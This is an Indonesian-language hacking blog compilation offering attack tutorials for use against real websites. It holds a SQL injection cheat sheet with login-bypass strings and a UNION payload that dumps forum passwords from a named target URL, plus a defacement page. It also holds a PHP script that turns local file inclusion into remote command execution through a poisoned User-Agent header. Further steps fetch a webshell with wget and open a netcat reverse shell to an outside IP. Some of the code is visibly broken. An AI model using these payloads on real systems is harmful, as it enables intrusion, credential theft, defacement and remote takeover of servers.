Sementara suntikan union kadang-kadang Anda akan mendapatkan error karena settingan bahasa yang berbeda (tabel, pengaturan lapangan, meja gabungan pengaturan db / dll) fungsi-fungsi ini sangat berguna untuk melewati masalah ini. Ini jarang tetapi jika Anda berhadapan dengan Jepang, Rusia,Turki dll. Maka Anda akan melihat perbedaannya.

* SQL Server (S)
Gunakan field SQL_Latin1_General_Cp1254_CS_AS atau field yang sah lainnya - lihat dokumentasi SQL Server.

* MySQL (M)
Hex() untuk setiap masalah yang mungkin

Login Screen (SMO+)
SQL Injection 101, trik Login

* admin’ –
* admin’ #
* admin’/*
* ‘ or 1=1–
* ‘ or 1=1#
* ‘ or 1=1/*
* ‘) or ‘1′=’1–
* ‘) or (’1′=’1–
* etc….

* Login as different user (SM*)
‘ UNION SELECT 1, ‘anotheruser’, ‘doesnt matter’, 1–

*Old versions of MySQL tidak mendukung permintaan union
Kesalahan Berdasarkan - Find Columns Names
Finding Column Names with HAVING BY - Error Based (S)

Dalam urutan yang sama,

* ‘ HAVING 1=1 –
* ‘ GROUP BY table.columnfromerror1 HAVING 1=1 –
* ‘ GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 –
* ‘ GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 — dan seterusnya
* Jika Anda tidak mendapatkan kesalahan lebih dari itu maka beres.

menemukan berapa banyak columns dalam SELECT query by ORDER BY (MSO+)

Menemukan column number dari ORDER BY dapat mempercepat proses UNION SQL Injection.
* ORDER BY 1–
* ORDER BY 2–
* ORDER BY N– dan seterusnya
* Terus sampai mendapatkan error. Error berarti Anda telah menemukan jumlah kolom yang dipilih.

Data types, UNION, etc.
Hints,

* Selalu gunakan UNION ALL karena gambar jenis bidang yang sama tidak berbeda. Dengan Union default mencoba untuk mendapatkan catatan dengan berbeda.
* Untuk menghilangkan catatan unrequired dari penggunaan tabel kiri -1 atau tidak ada pencarian record pada awal query (jika injeksi di WHERE). Hal ini bisa menjadi penting jika Anda hanya mendapatkan satu hasil pada suatu waktu.
* Gunakan NULL dalam suntikan UNION untuk tipe data yang instead bukannya mencoba menebak string, tanggal, integer dll
o Hati-hati dalam Blind situtaions mungkin Anda bisa mengerti kesalahan yang berasal dari DB atau aplikasi itu sendiri. Karena bahasa-bahasa seperti ASP.NET umumnya melempar kesalahan saat mencoba untuk menggunakan nilai NULL (karena biasanya pengembang tidak mengharapkan untuk melihat NULL dalam bidang username)

Mencari Column Type

* ‘ union select sum(columntofind) from users– (S)
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server] Jumlah atau operasi agregat rata-rata tidak bisa mengambil tipe data varchar sebagai argumen.

Jika Anda tidak mendapatkan error itu berarti kolom numerik.

* Anda juga dapat menggunakan CAST() or CONVERT()
o SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL–

* 11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 ¨C-
No Error - Syntax is right. MS SQL Server Used. Proceeding.

* 11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 ¨C-
No Error ¨C First column is an integer.

* 11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 –
Error! ¨C Second column is not an integer.

* 11223344) UNION SELECT 1,¡¯2¡¯,NULL,NULL WHERE 1=2 ¨C-
No Error ¨C Second column is a string.

* 11223344) UNION SELECT 1,¡¯2¡¯,3,NULL WHERE 1=2 ¨C-
Error! ¨C Third column is not an integer. …

Microsoft OLE DB Provider for SQL Server error ‘80040e07′
Explicit konversi dari tipe data int gambar tidak diperbolehkan.

Anda dapat convert() error sebelum target union errors! Jadi, mulailah dengan mengkonversi () Union
Simple Insert (MSO+)
‘; insert into users values( 666, ‘attacker’, ‘foobar’, 0xffff )–
Useful Function / Information Gathering / Stored Procedures / Bulk SQL Injection Notes

[Tutorial] Hacking Forum ASP For Newbie

Kali ini saya mencoba memberikan Tutorial Hacking Forum ASP.
Tutorial ini saya dapat dari Tim Hacker Indonesia.

Tutorial Hacking Forum ini cukup mudah untuk dilakukan.
langsung saja masuk langkah langkahnya,

Dork ::

inurl:/forums.asp?iFor=

ketikan perintah tersebut di kolom seach Google dan carilah target anda.

contah target :

http://www.antanio.com/forum/forums.asp?iFor=7

selanjutnya hapus angka dibelakang tanda [=] hingga menjadi seperti ini :

http://www.antanio.com/forum/forums.asp?iFor=7

kemudian tambahkan perintah SQL dibelakang tanda [=] dengan kode :
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,1 1,12+from+users
sehingga menjadi seperti ini :

http://www.antanio.com/forum/forums.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,1  1,12+from+users

Tulisan yg berderet di bawah nama 10 TOPICS itu adalah username nya,
Tulisan yg berderet di bawah nama DATED itu adalah passwordnya.

pilih ID yang mau anda gunakan untuk login.
misalnya :
USERNAME : yama
PASSWORD : bkcidworm

Selamat,anda sudah berhasil menerobos Forum tersebut.
selanjutnya terserah anda mau melakukan kegiatan hacking apa.

Jika ingin menutup seluruh halaman tersebut gunakan kode script berikut :

<DIV align=center><DIV id=Layer1 style="BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px; Z-INDEX: 1; LEFT: 0px; BORDER-LEFT: black 1px; WIDTH: 1000px; BORDER-BOTTOM: black 1px; POSITION: absolute; TOP: 0px; HEIGHT: 4000px; BACKGROUND-COLOR: black; layer-background-color: black"><center>
<br><b><font face="papyrus" color="red" size="5">..::HACKED BY Man In Black::..</font></h2><br><br><img src="http://img141.imageshack.us/img141/8227/anialienheadgrn02c.gif" ><br><br>
<font face="papyrus" color="red" size="5">Aceh Under Attack :<br></a><br><br>
<font face="papyrus" color="GREEN" size="2">thanks -->>>: </font><br><br><font color="GREY" size="5">HACKER COMMUNITY</font><br><font color="GREY" size="5">..::(Man In Black)::..</font><br><font color="green" size="2">http://indonesianhacker.org</font><br><br><font color="green" size="2">contact us: intel_88@yahoo.com

</DIV>

thanks to Indonesian Hacker
Hacker Manado

[Tutorial Hacking]Exploitasi LFI dengan injeksi Environ

Kali ini saya mencoba memberikan tutorial Hacking dengan teknik Explitasi LFI atau biasa disebut dengan Local File Inclusion.
Metodae LFI ini sama halnya dengan metode RFI atau Remote Command Execution yang tutorialnya saya akan bahas nanti.
Perbedaan antara keduanya adalah teknik hacking dengan metode RFI dilakukan dengan cara mengincludekan file secara remote.Sedangkan teknik  Hacking LFI maka kita bisa mengincludekan file yang ada di komputer victim secara langsung.Dari situlah kita bisa menyusup ke server target secara lebih dalam.
Banyak metode yang bisa kita lakukan,misalnya dengan menginjeksi apache log access,dll.
mengenai teknik apache log injection saya akan bahas nanti.




Pada tutorial kali ini,saya coba menjelaskan bagaimana membuat sebuah Remote Command Execution (RCE) pada LFI dengan memanfaatkan ENVIRON (/proc/self/environ). Bagaimana file environ  ini bisa menjadi sebuah RCE melalui LFI? jawabanya simple, karena kita bisa menginclude file environ ini, dan kita bisa memanipulasi header browser kita untuk mengirim membuat sebuah RCE dan mengexploitasinya.

teknik injeksi LFI,seperti pada umumnya,kita harus menemukan dulu direktori utama dari server ini.Teknik kuno yang ampuh adalah dengan mencoba satu persatu, dan menaikan ke tingkat direktori di atasnya.

Perhatikan ::

http://site.com/buglfi.php?exp=../etc/passwd   <<< percobaan pertama naik 1 direktori di atas.

bila gagal, naikan lagi ke direktori di atasnya lagi ::

http://site.com/buglfi.php?exp=../../etc/passwd
http://site.com/buglfi.php?exp=../../../etc/passwd
http://site.com/buglfi.php?exp=../../../../etc/passwd   <<< terus naik sampai file /etc/passwd terinclude.

contoh isi dari /etc/passwd

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

bila menemui halaman berisi seperti itu, berarti sudah ketemu letak direktori root. misal :

http://site.com/buglfi.php?exp=../../../../../etc/passwd

itu adalah teknik mendasar dari LFI. teknik tersebut tetep di perlukan untuk menemukan direktori root.

next, seperti yang saya katakan tadi, kita akan membuat RCE melalui ENVIRON.

Langsung aja kita include file environ ini.

http://site.com/buglfi.php?exp=../../../../../proc/self/environ

injek dan dapatkan output dari file ini. apa yang terlihat?

DOCUMENT_ROOT=/home/rialto/public_html?GATEWAY_INTERFACE=CGI/1.1?HTTP_ACCEPT=text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5?HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.7?HTTP_ACCEPT_ENCODING=gzip,deflate?HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5?HTTP_CONNECTION=keep-alive?HTTP_HOST=www.liveattherialto.com?HTTP_KEEP_ALIVE=300?HTTP_USER_AGENT=[b]Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404[/b]

perhatikan output tersebut. amati apa yg tampak. cari2 apa yang bisa kita manfaatkan. cari detil demi detil. putar otak kiri kanan atas bawah.pasti ketemu
perhatikan text yang tak tebalkan. itu adalah user agent. informasi yang di berikan oleh "browser kita" ke server. yg berarti informasi tersebut "di kirim oleh browser kita" ke server.itu muncul mozilla karena gw emang pakai mozilla firefox. info itu di kirim oleh browser ke server victim.
sekarang kita ingat hal penting dalam Hacking, pengetahuan basic dari webhacking :
"sesuatu (input,variable,script) yang di kirimkan dari browser, bisa di manipulasi melalui browser agar di proses oleh server".

Lalu apa hubunganya hal ini dengan inject environ? simple sob. Perhatikan output yang kita terima setelah kita menginclude file environ. informasi useragent dari browser kita di tampilkan oleh file ini, berarti kita bisa memanipulasi user agent ini sesuai yang kita inginkan. Salah satunya mengirimkan perintah jahat ke victim ((demit mode on)).

Untuk manipulasi header ini, ada cara yg sangat mudah, yaitu dengan menggunakan addons firefox bernama tamper. tapi saya tidak akan menggunakan cara instan seperti itu, karena kita sedang belajar. Jadi saya akan jelaskan Proof Of Concept nya semampu saya.

OK. Next --> Coding.
saya harap kalian tidak bosan sama coding. karena kita hidup di dunia 0 dan 1, jadi mau tidak mau harus selalu berususan dengan coding.

###[ HTTPQUERY pada PHP ]###
http query berfungsi untuk melakukan koneksi ke sebuah host melalui protokol http, kemudian mengambil output dari hasil query. ringkasnya httpquery bersifat seperti web browser.

$sock = fsockopen("sasaran.com","80",$errno,$errstr,30);   // lakukan koneksi ke sasaran.com port 80
$get  = "GET /index.php HTTP/1.1\r\n".    // minta file index.php (browsing membuka file index.php)
 "Host: sasaran.com\r\n".          // hostname
 "Accept: */*\r\n".                // accepted methode
 "User-Agent: Mozilla/5.0 \r\n".   // [b]USER AGENT[/B]
 "Connection: Close\r\n\r\n";      // tutup koneksi
fputs($sock,$get);                        // kirimkan request
while (!feof($sock)) {                    // ambil output yg di terima dari hasil kirim request
 $output .= trim(fgets($sock, 3600))."\n";            
}
fclose($sock);                            // tutup koneksi
echo $output;                             // tulis/cetak hasil httpquery
?>

dengan cara seperti ini, kita akan mendapatkan hasil yang sama dengan browsing menggunakan browser. bedanya kita bebas mengirimkan header http apa aja. perhatikan bagian USER AGENT. di situ saya tuliskan Mozilla/5.0. sehingga informasi browser yang di terima oleh sasaran.com adalah Mozilla/5.0. Kalau user agent saya isi dengan nama saya, maka server akan mengetahui kalau useragent adalah Qubex.

"User-Agent: ArRay \r\n"

sehingga, hasil output ke browser, akan tertulis useragent adalah Qubex.
dengan cara seperti ini, kita bisa menyisipkan malicious code ke server.

"User-Agent: Mozilla/5.0  \r\n"

dengan cara seperti itu, maka shell command uname -a dan ls -la akan di jalankan di sasaran.com dan hasilnya di cetak di browser. jadilah sebuah teknik menginjeksi yg mudah. begitulan PoC dasar dari teknik ini.

$sock = fsockopen("sasaran.com","80",$errno,$errstr,30); 
$get  = "GET /index.php HTTP/1.1\r\n". 
 "Host: sasaran.com\r\n". 
 "Accept: */*\r\n".
 "User-Agent: Mozilla/5.0 \r\n".
 "Connection: Close\r\n\r\n";
fputs($sock,$get);
while (!feof($sock)) {
 $output .= trim(fgets($sock, 3600))."\n";            
}
fclose($sock);
echo $output;
?>

dengan merubah user agent, kita bisa mengirimkan command apa saja ke server. sebuah malicious yang mudah dan menyenangkan. kita bisa merubahnya dan menjalankan satu demi satu.

seperti yang saya katakan tadi, kita akan membuat sebuah RCE. Sehingga kita bisa mengirimkan command2 ke server dengan mudah layaknya menginjeksi bug RCE, tanpa harus edit2 coding lagi. kita tinggal mengedit code tersebut menjadi lebih otomatis.

contoh berikut, saya membuat scriptnya untuk di jalankan di command line interface. dengan script berikut, saya akan mengirimkan command ke server dengan cara berikut (in CLI misanl SSH):

./lfi "http://sasaran.com/buglfi.php?example=[command-command ke server]"
./lfi "http://sasaran.com/buglfi.php?example=[uname -a; pwd; ls -la; find ./ -perm 777 -type d]"  << contoh

#!/usr/bin/php
//ambil variable
$com = str_replace('"','',$_SERVER['argv'][1]); // hilangkan petik
$sub = explode("[",$com); // pisah bug dengan command
$url = str_replace("http://","",$sub[0]); // url
$site= explode("/",$url,0); // sitename
$bug = str_replace($site."/","",$url); // bug path
$cmd = substr($sub[1],0,(str_len($sub[1])-1)); // command

//dapatkan path direktori utama
$path = '/';
while(!$mainpath){
$output = false;
$sock = fsockopen($site,"80",$errno,$errstr,15);
$get = "GET /".$bug.$path"etc/passwd HTTP/1.1\r\n".
"Host: ".$site."\r\n".
"Accept: */*\r\n".
"User-Agent: Mozilla/5.0\r\n".
"Connection: Close\r\n\r\n";
fputs($sock,$get);
while (!feof($sock)) {
$output .= trim(fgets($sock, 3600))."\n";
}
fclose($sock);
if(eregi("root:",$output)){
$mainpath = $path;
}
$path .= "../";
}

// hentikan exploitasi jika tidak mendapatkan main direktori path
if(!$mainpath){
print "Failed!\r\n"; exit();
}

//injek environ
$output = false;
$sock = fsockopen($site,"80",$errno,$errstr,15);
$get = "GET /".$bug.$mainpath"proc/self/environ HTTP/1.1\r\n".
"Host: ".$site."\r\n".
"Accept: */*\r\n".
"User-Agent: Mozilla/5.0 '.system('".$cmd."').'[XCREW]';\r\n".
"Connection: Close\r\n\r\n";
fputs($sock,$get);
while (!feof($sock)) {
$output .= trim(fgets($sock, 3600))."\n";
}
fclose($sock);

//failed jika tidak bisa include environ/gagal
if(!eregi("[XCREW]",$output)){
print "Failed!\r\n"; exit();
}

//ambil output command
$result = explode("[XCREW]",$output);
$hasilcommand = $result[1];

print $hasilcommand."\r\n";
exit();
?>

dengan script sederhana tersebut, saya dapat RCE dari LFI.

####[ Scenario download webshell ]####

./lfi "http://sasaran.com/buglfi.php?example=[find ./ -type d -perm 777]"
./lfi "http://sasaran.com/buglfi.php?example=[cd writeable/dir/; wget http://shell.ku/bd.txt; mv bd.txt bd.php]"

Shell uploaded to http://sasaran.com/writeable/dir/bd.php

####[ Scenario backconnect ]####

./lfi "http://sasaran.com/buglfi.php?example=[find ./ -type d -perm 777]"
./lfi "http://sasaran.com/buglfi.php?example=[cd writeable/dir/; wget http://shell.ku/nc;]"
./lfi "http://sasaran.com/buglfi.php?example=[writeable/dir/nc -vv 202.212.22.11 9999 -e /bin/bash &]"

begitulah, salah satu jurus Hackin exploitasi LFI. pada teknik ini, selain belajar teknik lfi, kita juga secara tidak langsung belajar untuk mengirimkan command dengan manipulasi header http yang memanfaatkan sifat dari server. teknik seperti ini juga bisa di pakai pada bug lain yang memiliki sifat yg sama, yaitu mencetak informasi yang dikirim dari browser. karena, segala sesuatu yang di kirimkan dari browser bisa kita manipulasi sesuka kita. ini adalah hukum alam. kembangin sendiri script tersebut. sempurnain, karena itu juga asal ketik.



thanks to ArRay
Hacker Manado

Tutorial hacking,ilmu hacking,dunia hacking,web category,menjadi hacker,be hackeron facebook,How to Hack,free download,what is .net,gmail,download free,what is software,software for,software to,software de,word,free downloads,software programs,application,hacker,tips dan trik hacking, tutorial hacking, tools hacking, hacker manado, manado hacker, team hacker manado, software hacking,ilmu komputer,tips dan trik SEO,facebook,twitter,tips dantrik twitter,hack facebook,hack twitter,Hacking website,hack traffic blogger,city guide,manado,travel reviews,PC computers,laptop,notebook,computer pc